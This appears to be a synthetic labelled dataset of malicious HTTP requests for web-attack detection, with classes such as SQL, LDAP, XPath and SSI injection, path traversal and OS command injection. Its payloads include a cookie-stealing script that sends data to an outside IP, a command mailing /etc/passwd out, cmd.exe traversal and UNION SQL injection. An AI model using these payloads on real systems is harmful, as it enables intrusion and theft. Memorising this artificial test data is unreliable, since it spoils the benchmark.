~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pasarsttce=hst u]sdunionnietc7&e46cmwtathlfu2=eZVOX5zZ@y&at=no&lmha=hozkLs&eetone=ehe&KJd0OHF1H=ohyho&rpfqepd=15641&yp5snpwam=le&aioatem7naHtrf=<xml  id   =    "   X   "   ><a    ><b    >&lt;script >[window.open('http://235.119.109.188/me.php4'+document.cookie);]&lt;/script  >;</b ></a></xml    >&efiiotrln=nclrcnsteoe

End - Id: 46810
Start - Id: 37545
class: LdapInjection
POST /a85wSxZ6z.css? HTTP/1.1
Content-Length: 59
Content-Language: n,annxx
Content-Encoding: gzip
Content-Location: http://www.bh3ia.cz/vjnh/uoemhc/doaptoM2/kaDiSR/utp1Tm.mp3
Content-MD5: dWt0OWNxYWFvY2V3anNlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 19:40:03 CET
Last-Modified: Tue, 14 Mar 06 23:41:22 GMT
Host: www.Ham5.ch
Connection: 8efsr
Accept: */*
Accept-Charset: cp-932
Accept-Encoding: 
Accept-Language: utbea7Dr-coonMa;q=0.3, t-Arjt;q=0.5
Cache-Control: max-age=2963
Client-ip: 128.166.47.177
Cookie: ectibsbnthc57eu=hNmacqet0nyEote;iblcnpafnc3n6r=riHoO
Cookie2: $Version="00"
Date: Thu, 24 Jul 08 22:30:04 UTC
ETag: W/"7fYEeeHR2qFRIAZreRVc"
Expect: 3hainp=yeeT
From: nIt1h@rvrs.org
If-Modified-Since: Sun, 06 Apr 08 18:27:07 GMT
If-Unmodified-Since: Sun, 19 Jul 09 04:11:41 CET
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "FfXz0MQlWO0Py95pXt"
If-Range: Sat, 15 May 04 17:49:40 CET
Max-Forwards: 3
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM MWh3dWdhbzRnbFRudnVqZmpiRWxsbmgzZHMwd2IyZWZsZWVuaEpkb25jcWdFTnV0
Authorization: NTLM emxsb2Rhc3FjOWVuZHRiZGp0eVNpdHlzZGUxc2k0c3JSaW8wZXc=
Range: 0516-7855,069180-,334-
Referer: /ttzl0c.css
TE: gzip
Trailer: TE
User-Agent: nleYQ0JGI http://www.adtro.com
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: 5.9 216.20.13.22
Transfer-Encoding: identity
Upgrade: 7dan1/4.1, egy/8.2, adh/9.9, duh9t/0.3
Warning: 983 109.244.195.91 "L7Uqnd6Rnxrtrw" "Mon, 04 Apr 05 04:37:49 GMT"
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7qgrw5u=687&luleh=idte)(&(objectClass   =iibt*)

End - Id: 37545
Start - Id: 49843
class: XPathInjection
GET /fizp4TZ.b/e.EidGNwq/updates6HoT-HSdocument0Z/2GmJuUNFYDeaccess_logCc/eEEToK2ICnPp/bamtlilwoeae6/.andoeKQ/eJ/epANOF8/nt3oUdxNgz9j/3UUz.btmk45/ynee.swf?SriNrznabnozlec=49&iAB=a5%24h%3Bueo&ti=mndaart&pudn=nmpdt&oa3ashast=bodypnno%2B+a99&tsenw=787&dro0ra=d.BF&NtomlEo=gsehh%2Fieipe%2Fi%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D3%5D++or+%27ceo53%27%3D%27&e3=fW.vqv&xp_I1PpKnullIc=gFJHCslVH&tmwsa=39 HTTP/1.0
Host: 217.159.234.147
Connection: yocj
Accept: image/*;q=0.6
Accept-Charset: windows-1253, windows-1251;q=0.4, iso-8859-8-i;q=0.4, shift_jis
Accept-Encoding: identity;q=0.1
Accept-Language: *
Cache-Control: min-fresh=53050
Client-ip: 146.101.131.153
Cookie: lpr=mtf71;nbn=0/a\script
Cookie2: $Version="7"
Date: Wed, 18 Aug 04 09:48:44 CET
ETag: "cRd@wIXMwE63R.EvjfGq"
Expect: ackeIlr=n1aE
From: dlraatp@oeowhntmtq.org
If-Modified-Since: Thu, 21 Jul 05 01:11:55 CET
If-Unmodified-Since: Thu, 12 Jan 06 16:12:41 UTC
If-Match: "PU_DlUXrgu.Bkj.f"
If-None-Match: "HFh47depKuS2t_Rfa"
If-Range: "wTfZaQw2.ByFp_DZb"
Max-Forwards: 70
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: Digest cnonce="cmnoh"
Range: 376648-,445-
Referer: /wiedo/trg8lkg.tiff
TE: trailers,deflate;q=0.0
Trailer: Accept
User-Agent: Mozilla/4.3 (Windows; U; Windows NT 3.6; wi-e3; rv:3.5.1) Gecko/28288803
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 172x6984
Via: 7.4 www.emxdo9.html, 0.2 102.24.240.116, ftoh/6.0 www.eodiin.css:8449
Transfer-Encoding: gzip
Upgrade: soar/0.1
Warning: 331 www.AWev.htm "atqetujtaOta9Meosn" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 6075380404911977
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49843
Start - Id: 35325
class: SqlInjection
GET /Esxhaenistogwmtcs/evj39HB3-z5acg/XhuedwrftmnSlet3hii/sAQVWGlXyOtbN-kzy8u/20xVJ-hS9u.CN.jpeg?73iinme=oq3a&woKmawnsurY5hne=drtIRdS&dRn1atta=htep&uwt=amchild&usea7eeaoeserh=49998&Gty=iir&i8u4fpuouEBt=%27%29%2F**%2FUNIONALL%2F**%2FSELECT%2F**%2F7350%2F**%2FFROM%2F**%2Fsetanoout%2F**%2FWHERE%2F**%2F%28++%27%27+%3D++%27++++%2F**%2F&seOi3ccgensc=rneinae&6cnstieStls=war%40bt HTTP/1.1
Host: www.8rauicFtd.ch:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: b5t-jtir;q=0.1, rs8i9est-hEttmt, Neimndap-uosdI, ordO-teu;q=0.3, or5-wjyroc;q=0.5
Cache-Control: max-age=01
Client-ip: 26.173.42.23
Cookie: 7replace8D3N=o+g@lbgsound';glXxih=eDDwJ;te=aNAyCrIdxDI
Cookie2: $Version="54"
Date: Tue, 03 Jun 08 14:35:06 CET
ETag: "-1ukDA-pz9i_RiM"
Expect: 100-continue
From: bEvfTsnh@Bj08etuio.cz
If-Modified-Since: Mon, 20 Apr 09 07:23:10 CET
If-Unmodified-Since: Mon, 08 Dec 08 19:59:25 GMT
If-Match: *
If-None-Match: "oI3z9pxdslHC95lMq"
If-Range: "BM1Ustp4NmIMcKnK"
Max-Forwards: 2981
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: h4ImO6 ttdnx=rtunlw9
Authorization: Digest opaque="5qux6y"
Range: -699332,-7572
Referer: http://luOf.it/taee/omsi.shtml
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/5.6 (X11; U; Solaris 2.8; Ea-ct; rv:9.1.3) Gecko/16109794
UA-CPU: StrongARM
UA-Disp: 703,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 5578x419
Via: HTTP/6.2 151.185.132.179
Transfer-Encoding: deaz
Upgrade: wndma7/6.1, z9unl/1.7, lis/6.7
Warning: 581 186.145.143.176 "jcaoFa" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 246484
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35325
Start - Id: 36543
class: OsCommanding
GET /scripts/file.bat/..��..��..��winnt/system32/cmd.exe?/c%20dir%20C: HTTP/1.0
Host: www.lAoe6b1pb.it
Connection: meioeruv
Accept: image/*;q=0.4, audio/basic
Accept-Charset: us-ascii;q=0.0, x-mac-chinesesimp;q=0.6
Accept-Encoding: gzip;q=0.5, deflate
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 213.233.54.110
Cookie: teeb=hposition>]Edagsna;dotoaqwcrdzistl=1;mmitFsei=kLUoT1I;6aQn=srshai;il=e4csp;2Eri1Ytz=eO0pnnoht5ervawae
Cookie2: $Version="973"
Date: Mon, 03 May 10 09:56:03 UTC
ETag: "qAEfzWG5X7Zdf0i"
Expect: 100-continue
From: qslOdEWa@reveTya6.com
If-Modified-Since: Wed, 31 Mar 10 12:24:16 GMT
If-Unmodified-Since: Sat, 09 Jun 07 12:55:59 GMT
If-Match: *
If-None-Match: "DRah4eYE.S8OiDb"
If-Range: "DS-EBkB7seG4XvJI"
Max-Forwards: 07
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nc=Ad95328B
Authorization: 2Sa3e 7aaa=sttdaoE
Range: 9206-,968-
Referer: http://rLhc.net/nhiu1c2c.pdf
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/9.2 (compatible; MSIE 8.3; Open BSD i386; dc4tqia)
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 547x5195
Via: 8.7 www.yte1lalD.css
Transfer-Encoding: nm1x
Upgrade: ildtt/8.0
Warning: 826 69.77.188.222 "hEdhtjuthB0Ezshecem" 
X-Forwarded-For: 149.92.182.203
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36543
Start - Id: 35516
class: XPathInjection
GET /y2nCz111@bvbscript@bF.pl?eeEpptWtsRs=hurahple6t&OIeodrnt3ntahn=e6UyomewsiKteev&NmUbdy1qgetc=err4utkmto&0edoax4=+els&tlEziacxsz=6&etehoih5nyzs=nCstelsnpne68trdtr&nlaemt=iY4pzltAG8J&vpwdX=adO HTTP/1.1
Host: 57.126.157.243:80
Connection: close
Accept: audio/x-wav;q=0.5, image/*;q=0.2
Accept-Charset: iso-8859-3;q=0.3
Accept-Encoding: *
Cache-Control: no-store
Cookie: tgeneey1atoot=22129   or 1<  o6s/in/rteroa/child::text()[position()=34]  or 088='] | /* | /foo[bar=';teHmxDmminT=oi4services
Cookie2: $Version="419"
Date: Sat, 05 Nov 05 06:13:47 CET
If-Modified-Since: Sat, 21 May 05 09:32:29 UTC
Authorization: Basic bXBrdGVtOmFpZW9r
Referer: http://www.5etf.gov/pPwdEi/Tn2rnle/7sr5oi.pdf
Trailer: If-Range
User-Agent: wRst (cRM8EvH.0c; vPvVhG_-3; uHEQPM22bd; rckqA@6W6I; qpizVeih7x)
Via: oel7s/9.0 3.209.25.40, HTTP/7.4 www.ecrpx.png:1, 1.7 www.5wi0m5t.gif
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35516
Start - Id: 37941
class: LdapInjection
GET /nodeE7-jand0T/Z3/yu9ZxWMivVHWU/gu/AmOpbf6Rvsnec1/yteodroe/s8pqjiZu90vTz0/alOmdhees/memoZdde/lY9l2.R@Ih/leoe9nm3h/iE.css?te1oNguiog=xitlintacWa4oh&4wnsrRlr=ecs%29%28%26%28objectClass+%3D++++eeae*%29&JldMgdfgttgtne=864783&ayoa=2109394&hr35wuvmogHy=%7E%28+&o4r=5Hlt&erminh9el9lnO=72708961&Ponn8ecJgatNan=uAeea&baeadi4tc=e&oniia=iragba HTTP/1.1
Host: www.DzcA.cz
Connection: close
Accept: video/*;q=0.3, application/*, video/quicktime;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.3, identity, deflate;q=0.8
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 199.14.205.63
Cookie: yedrDh4=963
Cookie2: $Version="513"
Date: Wed, 02 Sep 09 16:00:09 GMT
ETag: "u106NQw10YKzurT3Qei"
Expect: ws62
From: p2udarel@zentnnsmu.org
If-Modified-Since: Mon, 31 Jul 06 19:47:55 GMT
If-Unmodified-Since: Fri, 18 Feb 05 19:34:58 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Feb 10 18:30:31 UTC
Max-Forwards: 7818
MIME-Version: 3.4
Pragma: s='nihuc'
Proxy-Authorization: Digest cnonce="aEoaal"
Authorization: NTLM ZXJlaHJydGx2czBkc1RsZ1J5dG84Y3RscGFkc29pcnhuaGl1dA==
Range: -05,-121
Referer: http://www.sHoe.net/elwC/U4naog6/eEPDoYby.asmx
TE: trailers,chunked;q=0.7
Trailer: Accept-Language
User-Agent: Mozilla/1.1 (Machintosh; U; Mac OS X 4.7; nt-av; rv:5.5.3) Gecko/74145894
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 466x028
Via: nNgnaa/7.5 www.xehit.jpg, FTP/7.3 www.sHa8.css, HTTP/9.1 128.2.173.172
Transfer-Encoding: compress
Upgrade: spoM3/2.4, sus/6.4, cez/4.2
Warning: 842 www.ions.htm "attse" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 74950459649934208590
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37941
Start - Id: 45032
class: PathTransversal
PUT /ttcmnteLao/97O/ametsfdebadcObar/oa8suJt.spU5w9/03hudxgisnitfq9fdeij/shanwodite0YqoinA9.js? HTTP/1.0
Content-Length: 229
Content-Language: 3eDL4o
Content-Encoding: gzip
Content-Location: /enulhd9k.pl
Content-MD5: dG5uZU5ldGVlaTNzdXQ4YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 20 Jul 07 19:47:42 CET
Last-Modified: Sat, 16 Dec 06 24:18:36 CET
Host: 13.15.199.112
Connection: tiQaeci3
Accept: */*
Accept-Charset: windows-1254, windows-1258, euc-kr
Accept-Encoding: identity;q=0.8, compress, gzip, identity, deflate;q=0.2
Accept-Language: a9rdtr-39tp;q=0.7
Cache-Control: no-cache
Client-ip: 126.15.114.0
Cookie: iyraD=eErg;qio=tteopen;po=doc(    file:///c:/f8f/winEaok.xml);ormlazbumthix=80434957;DeiaE1alOaKo=22
Cookie2: $Version="67"
Date: Mon, 19 Jan 04 22:25:10 UTC
ETag: W/"TZED-z50e2nlMJXN"
Expect: Uoso
From: tsIdrEaF@ePsf3rennd.cz
If-Modified-Since: Thu, 05 Oct 06 04:15:02 GMT
If-Unmodified-Since: Wed, 25 May 05 12:47:02 CET
If-Match: *
If-None-Match: *
If-Range: "jOhyK.JqEMaVQGsjA0pF"
Max-Forwards: 85
MIME-Version: 7.0
Pragma: et=wd
Authorization: 4inur s2li=knm3tt
Range: 0850-47613,090-82,-0
Referer: http://siBdahsz.be/yitaD5le/wyoceor/re9srcru.sh
TE: chunked,trailers,chunked
User-Agent: Mozilla/1.9 (X11; U; Unix 1.4; tp-he; rv:7.8.4) Gecko/05409406
UA-CPU: Sparc
UA-Disp: 2130,688,16
UA-Color: color16
UA-Pixels: 827x9248
Via: 6.4 42.127.133.178, HTTP/0.6 223.8.126.99, rcr/8.1 182.253.175.41
Transfer-Encoding: identity
Upgrade: eAaRn/1.3, 920/0.6, Ate/9.0, Xie3ot/6.5
Warning: 356 183.89.97.198 "1std" "Sun, 18 Jul 04 06:45:57 GMT"
X-Forwarded-For: 206.19.206.22
X-Serial-Number: 66658659656
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tn8hht=ovH&eseebAna=ou.TrwX&aebib=laowhho&eocI4hnntCe9o=e rhittg+soNwindow.openm&5nsiwtliaard8dH=24&caTrc=875244464&e4=ni oblib/yIy&umnajuEns=77504036&mnip=lrms<e?f&nEXSpmailhtaccesEL=6surecuhpa0vopne&eis8eftcllHikr=%nm

End - Id: 45032
Start - Id: 38098
class: LdapInjection
GET /o0Vh/Notateayrl/ej9qr_x.T3q_U/PWWF/eyW7tsVq/sf2roeE7qxrnpRea9rz/TshFIPuY1V-FpY/tI1jpX8it/t0s3SHyA5vwv1/entceij95Hs/m88JJJ7ob2wp.jpeg?6uretihwUn1ef5s=82&tKyy-=d1Jp%40_H-&Vbetweenswp-=llE&5j4JQdocumentlrJ9r6=22305&gn3HmjqthFaoop=ensazlrid&easeagh4noape=ij9ofdefco&6u4niMQ6=4aye6mmouiN9onon&-fblrGb=dr%2Fas%3Eo%3BATchildreir&4zoetinterrj=n4B&6o=yCdratem&nUrcottB62ir=ser&al_YrF@Hlink6var=ddt6&euxoenp=%29%28++++%7C+%28e50e%3DgSrk*%29 HTTP/1.1
Host: 158.140.188.134:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.2
Accept-Language: iFreeuhp-elttira, maabH74-rrnh;q=0.1, rh-nin;q=0.9
Cache-Control: min-fresh=72
Client-ip: 80.51.6.160
Cookie: 3yy8=- c
Cookie2: $Version="433"
Date: Sun, 25 Mar 07 03:50:59 GMT
ETag: ".@oOa6lHm-n1XKovek"
Expect: yzytf=wi36hMoe
From: ehldyeiL@ertsuha.st
If-Modified-Since: Mon, 19 Oct 09 13:18:13 GMT
If-Unmodified-Since: Sat, 03 Feb 07 07:20:13 UTC
If-Match: *
If-None-Match: "7uUEgZHOE@Xa-@h6r"
If-Range: Tue, 03 Apr 07 05:46:09 GMT
Max-Forwards: 7
MIME-Version: 1.3
Pragma: Tcj=rt
Proxy-Authorization: atswre uFty=o9ssf
Authorization: NTLM ZWNvdTYwM3llMzlhdEw5cm56Z3dvbWlnTnJlb09naTlpbG01VFlj
Range: 943633-,-798,-667
Referer: /idmo/smex/aoesg/aRtd.php
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/6.0 (compatible; MSIE 1.8; Windows NT; hudeete; eSazIttz)
UA-CPU: 68000
UA-Disp: 6214,984,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: 6.8 177.60.252.111, 4.2 www.arrzt.css:8512, 5.0 241.22.114.3:419
Transfer-Encoding: deflate
Upgrade: ttyt/8.2, cspny/5.6, dpX8/2.9
Warning: 611 99.132.169.142 "aehcm" 
X-Forwarded-For: 42.181.165.201
X-Serial-Number: 2885123328233620
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38098
Start - Id: 36912
class: LdapInjection
POST /sh4flh4oel5c0s/execA64deleteSgrq2/tOQfca8gwLdr@UD1Y/mshnelTa/3BsMI/bAvYZchildvUHVo/dpVa8Y2W.vFIWHc/esgTcnha/_n2A.mspx? HTTP/1.1
Content-Length: 177
Content-Language: T4leE,hh
Content-Encoding: compress
Content-Location: /Eme8ccn/bsipLio/att7ppcr/tdn9lal.mpeg
Content-MD5: c2RJZGFub3N0cm5zVGV0RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Aug 09 07:37:56 UTC
Last-Modified: Fri, 15 Sep 06 05:55:14 GMT
Host: www.se3iekts6n.st
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: tCS-lnehelr;q=0.9, tOnoix-dem6;q=0.1, nhbRen-Aoser, ihhasir-rglc6un;q=0.0, es-baop;q=0.6
Cache-Control: erol4nO='tak4'
Client-ip: 46.117.86.31
Cookie: b8pe2ihuedoejad=iJDXhAW
Cookie2: $Version="09"
Date: Mon, 13 Sep 04 02:06:41 UTC
ETag: W/"Kz7Dmc-HYJYpwWQd6ii"
Expect: t7eiih=1zBcuhe;elVew
From: dhafadn@folsiatle.com
If-Modified-Since: Mon, 21 Jul 08 15:22:01 UTC
If-Unmodified-Since: Tue, 06 Nov 07 21:21:48 CET
If-Match: "oJWlpuWfQ@YNDG8"
If-None-Match: "p1@iPkWAkq9Qno3LQVw2"
If-Range: *
Max-Forwards: 7751
MIME-Version: 8.8
Pragma: tanoda='eePseiQ'
Proxy-Authorization: NTLM cmVlZXRyZWdpYWJlb3N0ZUFPdGd6bm85Ym5jbndpdG5jc2Vxc2J1YVNlcg==
Authorization: Digest username="snspsns"
Range: 03-
Referer: http://www.ea7g0.net/weowe/gdx2crde/LsbmLais/risaOrDs.cfm
TE: trailers
Trailer: Warning
User-Agent: Mozilla/4.3 (compatible; MSIE 7.8; Mac OS X; Wnronl; rinhIfexm)
UA-CPU: Sparc
UA-OS: Win98
UA-Pixels: 015x0585
Via: 7.8 203.76.183.211:24, 8.5 143.97.245.78
Transfer-Encoding: gzip
Upgrade: tn40Sc/6.9, 8ysiw/2.7, ehl4of/1.6
Warning: 029 17.241.6.13:76 "8tya4sneebfR" "Fri, 14 Mar 08 05:58:01 GMT"
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

aui=88&tFstdin8V_Nu=hi;6nn7&&Sre5nIsst=qJS6jk&GlnasebnrdIde8N=)    (   |    (esd=hnsu*)&Ceoounoea=507947&cll7=985534&AfluhCi8eZlt=an1 &u3qItuEi=m?els&iL6=El&

End - Id: 36912
Start - Id: 49153
class: XPathInjection
GET /uUqLWScJrBuLYkZ/xl_NT96Vw02Gj@/3ghpeseiAaeEerpsa/sZMrRBczRL9_oPA.shtml?XtOnWx=IfiD&7eval7vdXcO=gJRath&Oalt=hr&uVp8=7952329&rsIi=nhyaulhlrtKt&q5eOrt8troktE=%28i++++%3C+++count%28htyg%2Fchild%3A%3Atext%28%29%29++++and+++++j+++++%3C++count%28i7vec%2Fchild%3A%3Acomment%28%29%29+++++and+k++%3C+++++count%28jera%2Fchild%3A%3A*%29+++++%29 HTTP/1.0
Host: www.wteuy.net
Connection: close
Accept: image/png;q=0.9, application/postscript;q=0.0, video/mpeg;q=0.5
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *;q=0.4
Cache-Control: min-fresh=8
Client-ip: 16.167.236.167
Cookie: hMo3aaro1=9840;uaS=ecmnEjna
Cookie2: $Version="3"
Date: Fri, 28 Jul 06 17:25:29 UTC
ETag: "HjF@45Djy@lcchXqG"
Expect: o7fw=egoae
From: esgt1xrh@tidc.com
If-Modified-Since: Wed, 23 Mar 05 22:12:40 UTC
If-Unmodified-Since: Sun, 15 Mar 09 10:25:31 CET
If-Match: *
If-None-Match: *
If-Range: "OJIvPTeS_@EyuqIPocg"
Max-Forwards: 3
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest qop=di3aiteh
Authorization: woeb tyitxgi=npaonat
Range: 4916-
Referer: http://eeDmrr.fr/e2eda/mdrO/j1ebsni/oid4s/cNeaafrf.msf
TE: trailers
Trailer: Pragma
User-Agent: oieAnmrmPsoe
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7758x5013
Via: 9.8 www.ilhtnqh.htm, josbee/4.8 224.138.98.121:343, 9Vm/1.4 97.33.5.245
Transfer-Encoding: gzip
Upgrade: yfI/3.6
Warning: 246 47.3.57.5 "Oy3t1cdrbj" "Mon, 24 Sep 07 19:56:45 GMT"
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49153
Start - Id: 35866
class: XPathInjection
GET /tfIwa9bdYatfpql/Tr.ZxDuD-YjuoW/8sxCuYeccVE/fGBZ-/o3lVcmdHRallhud.QE/uB/eAKSnJBUzu-2.dll?kateotqemna=abnfbesslrrBrndaak&75C3oF=eUb1a%40m&ro=04&toRzefr2xdott=elsirctE%27+or+6+++%3C++count%28path%2Fchild%3A%3A*%29+or++++%27Onmaett3%27+++%3D++++%27&dmosnG=ats%7Ee&dsusod1ac=1eEKS2C&puoearelgLAqfu=wp-15eoopdshutdowna&hrazdyhlscK86k5=772822&ct1lnaeijqnoo=qg HTTP/1.0
Host: www.suiychnHrn.gov:338
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 120.36.228.130
If-Modified-Since: Wed, 07 Jan 04 09:32:30 CET
If-None-Match: *
Proxy-Authorization: Digest nonce
Referer: http://www.oiWiw.be/Eltss/ie1h/5na1ot.mp3
User-Agent: 57lethdroe/9.1.2

null

End - Id: 35866
Start - Id: 39746
class: SSI
GET /maIrrahrEhbuenty/aZtneuGeee39ikVQSw/DB5/SE3or944/yH/nL/eV-/ee5swuIehya53Oa/eJ743U@vkJTim/uz78HPMzc8_/pMDF/aH7@C1ts6DhbD.aspx?piRkoen3r=oQTx.B3fR&fLtndcvrx=e%28nlocationd+notmp%5Dv%40tmpssaio&raouh=5784&wre=%3C%21--++%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22--%3E&6T@mUEautoexeckd=shutdownr&u4zcnainmtawgo=bet%5D&kdn5a.=m&vaa3oceaar7g=544369&zouxiiaeEuy=1jceost&elA1ieM7hbryH=8K6fIIc-&orasyebse=6&KGQQ8=e4tSD6SXace_ HTTP/1.0
Host: 174.153.223.223
Connection: keep-alive
Accept: */*
Accept-Charset: big5
Accept-Encoding: compress, gzip;q=0.5, deflate;q=0.9, deflate
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 187.4.219.205
Cookie: t1a3hhu1nEata=ic;youmrnitt=hddzeez;mlezid=tm\;l3rrm5onsni0iE=eQy-pRHp.
Cookie2: $Version="7"
Date: Tue, 18 Mar 08 14:28:30 UTC
ETag: W/"kJbc9fupXLm3CC3oW."
Expect: td7ebjge
From: n4tbla@ol8e.st
If-Modified-Since: Thu, 26 Jul 07 16:27:46 CET
If-Unmodified-Since: Thu, 16 Oct 08 02:05:42 GMT
If-Match: "kmbtH3IHTltr-bJA5x1"
If-None-Match: "qrCLN77pFbQLBXq2b9gV"
If-Range: Mon, 03 Jul 06 13:28:37 CET
Max-Forwards: 0
MIME-Version: 3.3
Pragma: A='ri8ea'
Proxy-Authorization: Digest qop=auth-int
Authorization: nyks7 tHmRb8=vgc3
Range: -8768,74-87
Referer: /oiattexq/HvmnRuse/uss596/r72iprn.wmn
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: 6tan8o/7.6.9
UA-CPU: Sparc
UA-Disp: 1946,7252,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 930x2188
Via: FTP/7.9 218.128.171.42
Transfer-Encoding: gzip
Upgrade: 2to/5.7, h7i/2.7, ufnrto/8.8, fpto/1.4
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 177.241.180.13
X-Serial-Number: 43717297958345
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39746
Start - Id: 36787
class: OsCommanding
GET /srinsttbsx/If.png?teuetrvt=065658&imaebswtrt=uSUktP.U_vYX&aetmagash=oops+%3B+++cat++%2Fetc%2Fpasswd+%7C++mail+++your%40Rn.com&GnoRynonisinci=2frnu&eciowor1nscT=tk0shutdowni&0at=3&ig1e6efartt04=4517&lmsesdtc3lc9ea=srwr&serBkhOteRfrt=053101&it=+rsa&6mEGNu=oderi8cBcmeseAiogf HTTP/1.1
Host: 188.84.160.135
Connection: keep-alive
Accept: text/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.6
Cache-Control: oelfho=ot
Client-ip: 183.149.193.186
Cookie: pis4bedhoa=eezeonihhtaccesO;di=loegtu)Cre|n;noeOw=853;yecLrE=eqr
Cookie2: $Version="538"
Date: Fri, 19 Nov 04 23:12:37 GMT
ETag: W/"WNaw5RqhVgLPmf0nz7aY"
Expect: yblD
From: RdaleTeo@igeTtd.be
If-Modified-Since: Fri, 10 Feb 06 04:23:37 GMT
If-Unmodified-Since: Wed, 20 May 09 10:06:39 UTC
If-Match: "mo2Q3cUk.R5j7q2C7__k"
If-None-Match: *
If-Range: *
Max-Forwards: 4567
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest nc=1aE81C6d
Authorization: citeml sTeoegdo=Daea
Range: 907-5,-807
Referer: http://2esm.org/tomdteo/SUlvzea/alajht/soeOeArw.php
TE: trailers,gzip;q=0.4
Trailer: If-None-Match
User-Agent: tht8et (wIDAWUN5r; nlI8Dx)
UA-CPU: PowerPC
UA-Disp: 9579,9287,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: FTP/6.5 www.elie.jpg, HTTP/5.8 www.tmtoh.png, 5.2 www.ucbhroj.png
Transfer-Encoding: gzip
Upgrade: lNc/6.5, 7nli6/7.0
Warning: 133 www.UaEc.shtml:24599 "tmgftooT" 
X-Forwarded-For: 140.59.115.43
X-Serial-Number: 51873709956197
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36787
Start - Id: 43423
class: OsCommanding
GET /aQdQw.Q/rrjoit6srSeon/u2o/eeceirno9mb/8BIFconnect2aJSobjectNJ/rhhn2trwloon8ndeonl/xtalS2meta5ZVnmDS/s@VKMYoq0/j-vsKi_2MeH8.JXYL/ew-_yL9BHM1/qVEI/t9Tpnt9tnn6HnaCroi.shtml?ork=967176187&lRLql7o=+++++%3B+++echo++++++%3B+++++w++++++%3B++uname+++-a+++%3B+++++id&id@4Ln5perlD=a%400g6CEHVLh&pXqPHbWtmpN8=445&3p=6811&8mfromNWadW8vbscriptNt=ost%26t%29cn7urcdeletelr HTTP/1.1
Host: www.ps2gf.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: macintosh, koi8, x-mac-arabic, iso-8859-7
Accept-Encoding: gzip, identity, deflate, deflate
Accept-Language: eexn5-jm9
Cache-Control: max-age=04
Client-ip: 32.53.172.91
Cookie: 9eeIi=a&rtr80i nb;0il=leaccess_logadmineae1n+)EL?tps9c%link;bktapbvwr=3873
Cookie2: $Version="368"
